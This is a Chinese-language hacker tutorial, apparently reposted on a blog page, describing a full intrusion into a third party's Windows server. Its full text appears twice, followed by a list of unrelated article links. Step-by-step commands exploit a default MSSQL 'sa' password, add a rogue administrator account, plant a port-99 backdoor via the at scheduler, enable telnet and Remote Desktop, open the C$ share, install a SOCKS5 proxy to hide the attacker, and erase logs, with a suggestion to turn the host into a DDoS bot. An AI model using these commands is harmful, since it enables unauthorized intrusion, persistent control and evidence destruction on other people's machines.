一次详细全面的入侵
来源:互联网 发布:淘宝销售属性怎么设置 编辑:程序博客网 时间:2024/05/21 14:42
******************************************
影子鹰安全网络 kawen
Www.CnHacker.Cn
Www.ChinaEHacker.Net
黑客培训基地
安全服务中心
******************************************
现在网上所有的教程,差不多都是本着一种漏洞来进入系统,然后展开一系列的权限提升呀,留后门等工作
其实在网上来看教程及学习的人,百分之九十都是正在成长的兄弟,他们需要一个较全面的入侵报道,以便明白其中的秘密和关联,因此本文便产生了.没什么技术含量,主要面对初级用户.高手就不用看了.:)
影子鹰安全网络的技术论坛在每一天都会提供最新的肉鸡和代理供大家使用和学习.本文中特提及的肉鸡正来源于此.
注: 肉鸡为你已经得到权限的计算机
跳板则是在肉鸡的基础上被你做过内容,以方便自已的计算机
肉鸡: 211.75.X.X
事情发现在一个深夜.外面黑的吓死人,只有我的房间还亮着灯,我穿着一件黑色的大T 恤
按照网站论坛上的提示,211.75.X.X的USER为administrato,PASSWD为空,方式IPC连接
习惯性的先PING了一下该网站
C:/>ping 211.75.X.X
Pinging iceblood.yofor.com [211.75.X.X] with 32 bytes of data:
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Ping statistics for 211.75.X.X:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in
milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
看来网站开通在,哪就按提示IPC连接吧
注: IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
C:/>net use //211.75.X.X/IPC$ "" /user:"admintitrators"
系统发生1326错误
登陆失败:未知的用户名或错误密码
我晕,看来前来的兄弟将密码改了,还是自已动手吧
流光出场,看看可以扫到点什么有用的东东.十分钟后,流光扫描报告显示
PORT-> 主机 211.75.X.X 端口 0139 ...开放
PORT-> 主机 211.75.X.X 端口 0443 ...开放
PORT-> 主机 211.75.X.X 端口 080 ...开放
PORT-> 主机 211.75.X.X 端口 1433 ...开放
.........
最下面探测到了流光的默认MSSQL密码为SA
哈哈,这回有的玩了
打开SuperSQLEXEC,在IP中填上211.75.X.X,在USER中输入sa ,连接
稍等一会,出来了,我们现在利用了MSSQL的默认密码这个漏洞进入倒对方的系统了
c:/net user
admin administrator user aa bb
lqh test xxxxx ldir like
看来这台机子上有不少USER,反正也不差咱们一个了,
c:/net user kawen kawen /add
命令成功
c:/net localgroup administrators kawen /add
命令成功
OK,我们现在已成功的将KAWEN这个用户名加到管理员中去了.
退出SQL,我们现在又要转到IPC这边来了,打开DOS
C:/>net use //211.75.X.X/IPC$ "kawen" /user:"kawen"
命令完成
呵呵,看到没有,我们已经和对方IPC上了
现在要做的就是提升权限了,当然你可以用DameWare Mini Remote Control直接通过图形方式连上对方的计算机,就像3389一样.
C:/>copy srv.exe //211.75.X.X/admin$
C:/>net time //211.75.X.X
C:/>at //211.75.X.X 11:05 srv.exe
以上三步是我们要启动可以打开99端口的后门软件SRV.EXE
C:/>net time //211.75.X.X
再查查到时间没有?如果211.75.X.X 的当前时间是 2002/6/1 上午 11:05,那就准备开始下面的命令
C:/>telnet 211.75.X.X 99
C:/WINNT/system32
成功了,不过SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务,也就是打开对方的23端口
copy ntlm.exe //211.75.X.X/admin$
OK,我们直接运行C:/WINNT/system32>ntlm
当出现"DONE"的时候,就说明已经启动正常
然后我们使用net start telnet直接启动TELNET服务
OK,现在我们已经利用IPC进来了
下一步就是开一个3389端口,可以以图形方式直接登陆
请按以下步骤输入开启3389
c:/>query user
c:/>echo [Components] > c:/kawen
c:/>echo TSEnable = on >> c:/kawen
//这是建立无人参与的安装参数
c:/>sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/kawen /q
如果没有意外的话,几分钟计算机就会重启, 我们就可以利用3389的客户端连上去了
到这里为止我们通过MSSQL,IPC,99端口及TELNET后后又建立了3389端口,现在这台计算机我们已基本控制了,现在还要做的就是建立一个代理服务器,以便我们可以在网上做到踏雪无痕,
代理服务器的首选应该是SkSockServer
怎么上传到我们控制的计算机中呢,其实有多种方法,我们不是开了对方的23端口了吗
telnet上去
TELNET 211.75.X.X
C:/WINNT/SYSTEM32/NET SHARE C$
这一条命令是开对方的共享,然后在本机上的开始运行中直接键入//211.75.X.X就可以连上了,将SkSockServer拖到对方的C盘中就可以了.另外我们还可以利用流光的种植者直接种上去,也很简单
明白了吧
传上去后
c:/winnt/system32/sksockserver -install
开始安装SKSOCKSERVER
c:/winnt/system32/sksockserver -config starttype 2
c:/winnt/system32/sksockserver -config port 8888
c:/winnt/system32/net start skserver
这样我们就开启了一个端口为8888的SOCK5代理服务器,放在你的QQ上用吧
现在算来,该做的也差不多了,是到要走的时候了,清扫一下吧
这一步在这里比较简单了,推荐使用SSSO-Friend,一款图形界面的软件,他会帮你清掉你的PP,很简单
要的话联系我吧或是到down.chinaehacker.net下载
到这里教程也完了
总结一下,我们用了SQL,IPC,共享,开了99端口,23端口,3389端口,最后还做了一个SOCK5的代理服务器.其实运用上面的手法,你还可以做TFTP服务器,做成用于DDOS攻击的傀儡机器等等.没什么技术含量,只是想告诉各位一个最简单的道理,多看书,多运用,将本身不相关的东西相连起来,就会成为一个完整的圆.
影子鹰安全网络 kawen
Www.CnHacker.Cn
Www.ChinaEHacker.Net
黑客培训基地
安全服务中心
******************************************
现在网上所有的教程,差不多都是本着一种漏洞来进入系统,然后展开一系列的权限提升呀,留后门等工作
其实在网上来看教程及学习的人,百分之九十都是正在成长的兄弟,他们需要一个较全面的入侵报道,以便明白其中的秘密和关联,因此本文便产生了.没什么技术含量,主要面对初级用户.高手就不用看了.:)
影子鹰安全网络的技术论坛在每一天都会提供最新的肉鸡和代理供大家使用和学习.本文中特提及的肉鸡正来源于此.
注: 肉鸡为你已经得到权限的计算机
跳板则是在肉鸡的基础上被你做过内容,以方便自已的计算机
肉鸡: 211.75.X.X
事情发现在一个深夜.外面黑的吓死人,只有我的房间还亮着灯,我穿着一件黑色的大T 恤
按照网站论坛上的提示,211.75.X.X的USER为administrato,PASSWD为空,方式IPC连接
习惯性的先PING了一下该网站
C:/>ping 211.75.X.X
Pinging iceblood.yofor.com [211.75.X.X] with 32 bytes of data:
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Ping statistics for 211.75.X.X:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in
milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
看来网站开通在,哪就按提示IPC连接吧
注: IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
C:/>net use //211.75.X.X/IPC$ "" /user:"admintitrators"
系统发生1326错误
登陆失败:未知的用户名或错误密码
我晕,看来前来的兄弟将密码改了,还是自已动手吧
流光出场,看看可以扫到点什么有用的东东.十分钟后,流光扫描报告显示
PORT-> 主机 211.75.X.X 端口 0139 ...开放
PORT-> 主机 211.75.X.X 端口 0443 ...开放
PORT-> 主机 211.75.X.X 端口 080 ...开放
PORT-> 主机 211.75.X.X 端口 1433 ...开放
.........
最下面探测到了流光的默认MSSQL密码为SA
哈哈,这回有的玩了
打开SuperSQLEXEC,在IP中填上211.75.X.X,在USER中输入sa ,连接
稍等一会,出来了,我们现在利用了MSSQL的默认密码这个漏洞进入倒对方的系统了
c:/net user
admin administrator user aa bb
lqh test xxxxx ldir like
看来这台机子上有不少USER,反正也不差咱们一个了,
c:/net user kawen kawen /add
命令成功
c:/net localgroup administrators kawen /add
命令成功
OK,我们现在已成功的将KAWEN这个用户名加到管理员中去了.
退出SQL,我们现在又要转到IPC这边来了,打开DOS
C:/>net use //211.75.X.X/IPC$ "kawen" /user:"kawen"
命令完成
呵呵,看到没有,我们已经和对方IPC上了
现在要做的就是提升权限了,当然你可以用DameWare Mini Remote Control直接通过图形方式连上对方的计算机,就像3389一样.
C:/>copy srv.exe //211.75.X.X/admin$
C:/>net time //211.75.X.X
C:/>at //211.75.X.X 11:05 srv.exe
以上三步是我们要启动可以打开99端口的后门软件SRV.EXE
C:/>net time //211.75.X.X
再查查到时间没有?如果211.75.X.X 的当前时间是 2002/6/1 上午 11:05,那就准备开始下面的命令
C:/>telnet 211.75.X.X 99
C:/WINNT/system32
成功了,不过SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务,也就是打开对方的23端口
copy ntlm.exe //211.75.X.X/admin$
OK,我们直接运行C:/WINNT/system32>ntlm
当出现"DONE"的时候,就说明已经启动正常
然后我们使用net start telnet直接启动TELNET服务
OK,现在我们已经利用IPC进来了
下一步就是开一个3389端口,可以以图形方式直接登陆
请按以下步骤输入开启3389
c:/>query user
c:/>echo [Components] > c:/kawen
c:/>echo TSEnable = on >> c:/kawen
//这是建立无人参与的安装参数
c:/>sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/kawen /q
如果没有意外的话,几分钟计算机就会重启, 我们就可以利用3389的客户端连上去了
到这里为止我们通过MSSQL,IPC,99端口及TELNET后后又建立了3389端口,现在这台计算机我们已基本控制了,现在还要做的就是建立一个代理服务器,以便我们可以在网上做到踏雪无痕,
代理服务器的首选应该是SkSockServer
怎么上传到我们控制的计算机中呢,其实有多种方法,我们不是开了对方的23端口了吗
telnet上去
TELNET 211.75.X.X
C:/WINNT/SYSTEM32/NET SHARE C$
这一条命令是开对方的共享,然后在本机上的开始运行中直接键入//211.75.X.X就可以连上了,将SkSockServer拖到对方的C盘中就可以了.另外我们还可以利用流光的种植者直接种上去,也很简单
明白了吧
传上去后
c:/winnt/system32/sksockserver -install
开始安装SKSOCKSERVER
c:/winnt/system32/sksockserver -config starttype 2
c:/winnt/system32/sksockserver -config port 8888
c:/winnt/system32/net start skserver
这样我们就开启了一个端口为8888的SOCK5代理服务器,放在你的QQ上用吧
现在算来,该做的也差不多了,是到要走的时候了,清扫一下吧
这一步在这里比较简单了,推荐使用SSSO-Friend,一款图形界面的软件,他会帮你清掉你的PP,很简单
要的话联系我吧或是到down.chinaehacker.net下载
到这里教程也完了
总结一下,我们用了SQL,IPC,共享,开了99端口,23端口,3389端口,最后还做了一个SOCK5的代理服务器.其实运用上面的手法,你还可以做TFTP服务器,做成用于DDOS攻击的傀儡机器等等.没什么技术含量,只是想告诉各位一个最简单的道理,多看书,多运用,将本身不相关的东西相连起来,就会成为一个完整的圆.
- 一次详细全面的入侵
- 一次入侵秀的详细分析
- 一次入侵秀的详细分析
- 一次入侵的失败
- 记一次艰苦的入侵
- 记一次艰苦的入侵- -
- 记一次艰苦的入侵
- 我的一次入侵分析
- 一次完整的入侵检测
- 记一次前所未有巧妙的Hacking入侵
- 一次服务器遭受入侵的攻防
- 一次简单的3389入侵过程
- 记一次入侵XP系统的经历
- 一次利用imap漏洞的入侵
- 一次服务器被入侵后的分析
- 一次服务器被入侵后的分析
- 一次服务器被入侵后的分析
- 【日常】一次真实的入侵过程
- 关于Oracle数据库的用户对象配置以及数据镜像的总结--转载于项目组周朝勇笔记
- 今天用require 调试程序的时候
- lucene1.3-final完成支持中文的切词和检索了
- Unicode vs Ansi
- 我的J2ME学习历程4
- 一次详细全面的入侵
- 关于session_cache_limiter('private');
- 适得其反的员工激励(收藏)
- 黑客速成教材(稍长,需要耐心)
- 位运算
- 我的健康程序人生
- 用XMLHTTP Post/Get HTML页面时的中文乱码问题之完全Script解决方案
- 开张
- 在Linux下使Tomcat自动加入到系统启动中